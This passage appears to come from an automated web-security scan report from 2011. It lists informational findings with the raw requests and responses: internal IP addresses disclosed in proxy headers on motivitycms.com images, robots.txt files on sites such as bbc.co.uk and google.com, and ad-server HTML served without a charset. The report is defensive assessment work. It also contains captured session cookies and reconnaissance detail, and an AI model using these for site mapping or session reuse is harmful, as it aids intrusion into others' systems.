Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "c063b2a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 935
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196409
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aV.-....)9B)8B(7?...'6>...fx....0?H.........K\h]o}...x..o..x.....]n|o..ex..../?G0?IBR^J[g8HS9IT/?Hgy.]o|Tesex.\n|o..:JT9HS8HRSeqBR]Ter...:JUK[h(7A&5='5>...&5>*9B$2;$3;'6?%3<$2:%4<%3;(7@)8A&4=....
...[SNIP]...
14.168. http://www.motivitycms.com/images/nav/partnersOver.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/partnersOver.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/partnersOver.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "18db6a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 2380
Date: Sat, 09 Apr 2011 00:21:43 GMT
X-Varnish: 1413306950
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aV.-...."/6.(..#(.#).)0.%+!/6."(....'-.%* ,4!-4".6.'-.,2".5 -4.$*.&+.+1.(/"/7.*0.*0 -3.(/.......'.... ,2...*9B...v|.)/...+4:.$*......AUbw}.....(-5FQ...#08......8IU%3;0?I%2:W^b*49@S`......*48@Tav
...[SNIP]...
14.169. http://www.motivitycms.com/images/nav/services.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/services.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/services.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "de95b7a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 1176
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196290
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aU.-....)9B&5=(7?'6>}........u.....Vgtm..../>H^o~6FOew.m...=F]o|...Vgu7FQ^o}/=Gex....FWb>NY]o}>OZ0?I?OZ.=G/>G6FPM^k7GR>OY}..FVbUgtM^jfx.^p~7GQN^ku..EVbUgsn..7FP(7A)8B'5>...&5>*9B$2;$3;'6?%3<$2:%
...[SNIP]...
14.170. http://www.motivitycms.com/images/please-contact-me.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/please-contact-me.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/please-contact-me.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "d64ffea1b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:16 GMT
X-Powered-By: ASP.NET
Content-Length: 4509
Date: Sat, 09 Apr 2011 00:18:24 GMT
X-Varnish: 1413197119
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..)....r..i.....(.....[..L........K.....P........k..X........;.....6..U.....z...........h........e..}..n..l...........l..B..b..j........J..z..Z..j..^.....w.....S.....Z..V..]..X..R.....q..v..]...
...[SNIP]...
14.171. http://www.motivitycms.com/images/print-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/print-icon.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/print-icon.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "fea43a2b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:16 GMT
X-Powered-By: ASP.NET
Content-Length: 1035
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198208
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a...................aaa...e...........d.................e..nnnzzz..................J...........uuu......................................................J.....kkk|................................b
...[SNIP]...
14.172. http://www.motivitycms.com/images/rightcolumn-shadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/rightcolumn-shadow.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/rightcolumn-shadow.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "1c2cea2b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:16 GMT
X-Powered-By: ASP.NET
Content-Length: 881
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197696
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..................................................................................................................................................................................................
...[SNIP]...
14.173. http://www.motivitycms.com/images/sign-up-btn.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/sign-up-btn.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/sign-up-btn.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "8a1b1fa2b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:17 GMT
X-Powered-By: ASP.NET
Content-Length: 3201
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198123
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89af.+................r..w..^..b........Dh.......r.....[..p...........B...........e..h..S........V........Z..n.....a..t.....6..L..w..Q..].....h..z..E..`..f........q..L.....J..~..l..E..v..j..b..i...
...[SNIP]...
14.174. http://www.motivitycms.com/images/support-footer-nav.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/support-footer-nav.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/support-footer-nav.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "031bba2b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:18 GMT
X-Powered-By: ASP.NET
Content-Length: 6044
Date: Sat, 09 Apr 2011 00:18:27 GMT
X-Varnish: 1413198794
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................n.|..
...[SNIP]...
15. Robots.txt file  previous  next
There are 9 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

15.1. http://appointron.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: appointron.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:48:30 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 07 Apr 2011 07:05:43 GMT
Cache-Control: public, max-age=43200
Content-Length: 204
X-Varnish: 1233461936
Age: 0
Via: 1.1 varnish

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
15.2. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2068
Expires: Sat, 09 Apr 2011 00:50:50 GMT
Date: Sat, 09 Apr 2011 00:16:22 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...
15.3. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 09 Apr 2011 00:16:54 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
15.4. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1063327355/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1063327355/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 09 Apr 2011 00:16:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
15.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Date: Sat, 09 Apr 2011 00:16:22 GMT
Connection: close

User-agent: *
Disallow: /
15.6. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
15.7. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 08 Apr 2011 18:48:33 GMT
Expires: Fri, 08 Apr 2011 18:48:33 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
15.8. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 09 Apr 2011 00:17:14 GMT
Expires: Sat, 09 Apr 2011 00:17:14 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
15.9. http://www.googleadservices.com/pagead/conversion/992540712/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/992540712/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 09 Apr 2011 00:16:55 GMT
Expires: Sat, 09 Apr 2011 00:16:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
16. HTML does not specify charset  previous  next
There are 36 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

16.1. http://ad.adsrvr.org/container/7j9i29e.1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.adsrvr.org
Path:   /container/7j9i29e.1.html

Request

GET /container/7j9i29e.1.html HTTP/1.1
Host: ad.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.pagevester.com/en/product/Google-Website-Optimizer.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: YsV8IrV6Hr4EYj8lwRdOB+Jf7jEdkJQWaSBXNoLU8bvD0XI0wlYQiqNm62HOGTfK
x-amz-request-id: 532BDCF0218496A1
Date: Sun, 27 Mar 2011 21:57:32 GMT
x-amz-meta-cb-modifiedtime: Fri, 25 Mar 2011 21:40:34 GMT
Last-Modified: Fri, 25 Mar 2011 22:56:40 GMT
ETag: "af567da6ef16d89c082a2d3ce198af9e"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 333
Server: AmazonS3
Age: 43211
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 178fd7bc94808c550e3c95f55376de4d672ad1111f588ae8f563562d054dd1567cf7cd1bb1e67fe9
Via: 1.0 c3c3a30304f8f4fb5815fafdbfea3200.cloudfront.net:11180 (CloudFront), 1.0 d61e97feddc2f485be9a38d48a5cd5ca.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<img height="1" width="1" style="border-style:none;" alt="" src="//insight.adsrvr.org/track/conv?pid=2ktjv7m&ct=0:ACQ_site&v=0&vf=USD&adv=7j9i29e&fmt=3"/>
<img height="1" width="1" style="border-styl
...[SNIP]...
16.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:06 GMT
Expires: Mon, 11 Apr 2011 16:21:06 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.wsod.com/embed/8
...[SNIP]...
16.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Request

GET /adi/wn.loc.wcax/community;sz=300x250;wnsz=43;tile=4;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 566

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
16.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=52;tile=4;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 624

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
16.5. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/mostpopular

Request

GET /adi/wn.loc.wcax/mostpopular;sz=94x19;wnsz=88;tile=6;wncc=Most%20Popular;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a
...[SNIP]...
16.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Request

GET /adi/wn.loc.wcax/news;sz=94x19;wnsz=88;tile=8;wncc=News;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
